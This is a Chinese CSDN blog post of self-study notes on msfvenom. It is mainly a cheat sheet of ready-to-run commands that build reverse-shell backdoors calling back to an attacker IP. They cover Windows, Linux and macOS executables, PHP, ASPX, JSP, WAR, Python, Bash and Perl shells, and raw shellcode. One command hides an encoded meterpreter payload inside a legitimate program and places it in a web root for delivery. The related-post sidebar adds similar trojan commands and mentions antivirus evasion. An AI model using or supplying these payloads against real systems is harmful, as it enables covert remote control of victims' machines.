msfvenom学习笔记

最新推荐文章于 2024-05-11 11:31:04 发布
最新推荐文章于 2024-05-11 11:31:04 发布
阅读量2.2k 收藏 2
点赞数
分类专栏: web安全自学笔记 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zr1213159840/article/details/125470939
版权

msfvenom学习笔记

来源于啊B的这个视频的学习笔记,但是讲的很乱
在这里插入图片描述

什么是msfvenom?

msfvenom是msfpayload和msfencode的组合,将这两个工具集成在一个框架实例中,就是msfvenom。

msfvenom是用来生成后门的软件,在目标机器上执行后门后,在本地监听就能上线shell。

msfvenom常见参数

在这里插入图片描述

msfvenom生成可执行文件payload

linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f elf > shell.elf

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f exe > shell.exe

mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f macho > shell.macho

例子

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -x /root/Desktop/StampRemover.exe x86/shikata_ga_nai -f exe -o /var/www/html/heellloo.exe

含义:msfvenom可以帮助我们从大量的metasploit有效负载中创建需要的负载,合并到利用程序中。这里使用的编码(-e x86/shikata_ga_nai)的payload ( windows/meterpreter/reverse_tcp),要回连的主机和端口( lhostlport )、模板文件(-x /root/Desktop/StampRemocer.exe )、都会整合到/var/www/html/heello.exe中。

msfvenom生成各种语言payload

php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f raw > shell.php

aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f aspx -o shell.aspx

jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f raw > shell.jsp

java

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f war > shell.war

python

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f raw > shell.py

bash

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.80.130 LPORT=5443 -f raw > shell.sh

perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.80.130 LPORT=5443 -f raw > shell.pl

msfvenom生成shellcode

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c

linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c

mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c

msfvenom几个监听的参数介绍

在这里插入图片描述

铁锤2号
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3690
msfvenom的使用
Msfvenom使用指南
m0_57221101的博客
02-08 6074
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom 基本使用
blackguest07的博客
03-05 1463
msfvenom 基础命令
msfvenom介绍
最新发布
weixin_46483815的博客
05-11 1868
主要介绍msfvenom 和一些实验
msfvenom生成木马的简单利用
dodod2012的专栏
07-15 4670
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport.
msf使用方法
weixin_47679436的博客
05-16 314
msf使用
网络安全: Kali Linux 进行 MSFvenom 程序利用
cronaldo91的博客
03-06 1349
(6) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(1)Ubuntu创建计划任务crontab程序。(7)Kali Linux 连接后门。(2)Kali Linux 连接后门。(13)Ubuntu再次后台运行。(4)Ubuntu查看权限。(6)Ubuntu后台执行。(15)查看用户权限及进程。(1)查看DES 对称加密。(9)设置响应的IP地址。(4)设置响应的IP地址。(10)设置响应的端口。(5)设置响应的端口。
java学习笔记总结
04-02
这份“java学习笔记总结”涵盖了作者在深入学习Java过程中积累的知识点和实践经验,旨在帮助读者理解和掌握Java的核心概念。 首先,Java的基础部分包括语法、变量、数据类型、运算符和流程控制。Java支持八种基本...
MAKE 学习 笔记make
04-22
MAKE学习笔记
学习笔记学习笔记学习笔记
01-29
学习笔记学习笔记学习笔记
GCC 学习 笔记GCC学习笔记
04-22
GCC学习笔记
Tensorflow2学习笔记
06-08
北大 曹健老师课程的学习笔记上传供个人留存使用
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 1829
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
Meterpreter命令详解
热门推荐
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
msfvenom生成后台木马监听目标(windows渗透测试)
forget_mt的博客
12-06 8152
针对windows操作系统的渗透测试 操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。 实战: 一:后台木马生成 注意在代码中LHOST:172.16.5.2与LPORT:4444 要根据实际情况来更改 LHOST设置为渗透机的ip LPORT设置为监听的端口,端口只要不是已经占用的就可以 msfvenom -a x86 --platform windows -p windows/m.
msfvenom反弹
a439017985的博客
02-24 861
Linux   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf    Windows    msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe    Mac   msfven
Msfvenonm生成后门
weixin_44110913的博客
08-02 2098
目录 Msfvenom 生成exe木马 生成Linux木马 方法一: 方法二: 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。 Ms...
msfvenom——木马免杀篇
tomyyyyy
08-24 2841
msfvenom——木马免杀篇 目录msfvenom——木马免杀篇c语言执行生成shellcode.cc语言执行检查python语言执行方法一:python加载C代码方法2:py2exe打包编译exe方法3:base64编码c语言执行 生成shellcode.c msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_t...
渗透测试报告生成工具
superwshu
07-15 1630
一般我们在渗透测试过程中需要写报告,这对大多数人来说是个头疼的事情,下面给大家介绍几个报告生成神器以及专业的报告模板格式 1. Dradis -- 框架是一个开源的协作和报告平台。它是由Ruby开发的一个独立的平台。 2. MagicTree -- 类似于Dradis数据管理和报告工具。它被设计成方便和直接的数据整合,查询,外部命令的执行和报告生成。这个工具是预装在KaliLinux中位的“ReportingTools”的范畴。它遵循树节点结构来管理主机和相关数据 3. Metagoofi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值